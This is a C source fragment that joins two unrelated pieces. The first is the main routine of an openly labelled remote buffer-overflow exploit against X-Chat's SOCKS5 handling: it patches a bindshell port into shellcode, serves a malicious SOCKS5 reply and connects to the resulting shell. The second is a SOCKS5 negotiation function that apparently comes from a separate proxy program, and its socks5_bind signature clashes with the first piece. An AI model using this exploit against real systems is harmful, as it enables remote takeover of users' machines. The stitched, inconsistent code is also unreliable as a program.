int main(int argc,char **argv){ unsigned short port=DFLPORT,sport=DFLSPRT; unsigned int retaddr=BSEADDR; char *hostptr; if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1); printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp" "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n"); if(argc<2){ printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n", argv[0],BSEADDR); exit(1); } if(argc>1)retaddr-=atoi(argv[1]); if(argc>2)port=atoi(argv[2]); if(argc>3)sport=atoi(argv[3]); x86_exec[20]=(sport&0xff00)>>8; x86_exec[21]=(sport&0x00ff); printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n", retaddr,port,sport); hostptr=socks5_bind(port,retaddr); sleep(1); getshell(hostptr,sport); exit(0); }
int socks5_negotiate(int clisock, struct conndesc *conn) { u_int i; char hostname[256]; u_char nmethods, len, junk; struct sockaddr_in rem_in; struct socks5_req req5; struct socks5_v_repl rep5; struct hostent *hent; req5.vn = 5; req5.rsv = 0; /* * Start by retrieving number of methods, version number has * already been consumed by the calling procedure */ if (atomicio(read, clisock, &nmethods, 1) != 1) { warnv(1, "read()"); return (-1); } /* Eat up methods */ i = 0; while (i++ < nmethods) if (atomicio(read, clisock, &junk, 1) != 1) { warnv(1, "read()"); return (-1); } /* * We don't support any authentication methods yet, so simply * ignore it and send reply with no authentication required. */ rep5.ver = 5; rep5.res = 0; if (atomicio(write, clisock, &rep5, 2) != 2) { warnv(1, "write()"); return (-1); } /* Receive data up to atyp */ if (atomicio(read, clisock, &req5, 4) != 4) { warnv(1, "read()"); return (-1); } if (req5.vn != 5) return (-1); memset(&rem_in, 0, sizeof(rem_in)); switch (req5.atyp) { case SOCKS5_ATYP_IPV4: if (atomicio(read, clisock, &req5.destaddr, 4) != 4) { warnv(1, "read()"); return (-1); } rem_in.sin_family = AF_INET; rem_in.sin_addr.s_addr = req5.destaddr; break; case SOCKS5_ATYP_FQDN: if (atomicio(read, clisock, &len, 1) != 1) { warnv(1, "read()"); return (-1); } if (atomicio(read, clisock, hostname, len) != len) { warnv(1, "read()"); return (-1); } hostname[len] = '\0'; if ((hent = gethostbyname(hostname)) == NULL) { /* XXX no hstrerror() on solaris */ #ifndef __sun__ warnxv(1, "gethostbyname(): %s", hstrerror(h_errno)); #endif /* __sun__ */ return (-1); } rem_in.sin_family = AF_INET; rem_in.sin_addr = *(struct in_addr *)hent->h_addr; break; default: return (-1); } if (atomicio(read, clisock, &req5.destport, 2) != 2) { warnv(1, "read()"); return (-1); } rem_in.sin_port = req5.destport; /* * Now we have a filled in in_addr for the target host: * target_in, no socket yet. This is provided by the command * specific functions multiplexed in the next switch * statement. */ switch (req5.cd) { case SOCKS5_CD_CONNECT: return (socks5_connect(clisock, &rem_in, &req5, conn)); case SOCKS5_CD_BIND: signal_setup(); event_dispatch(); return (socks5_bind(clisock, &rem_in, &req5)); case SOCKS5_CD_UDP_ASSOC: default: return (-1); } }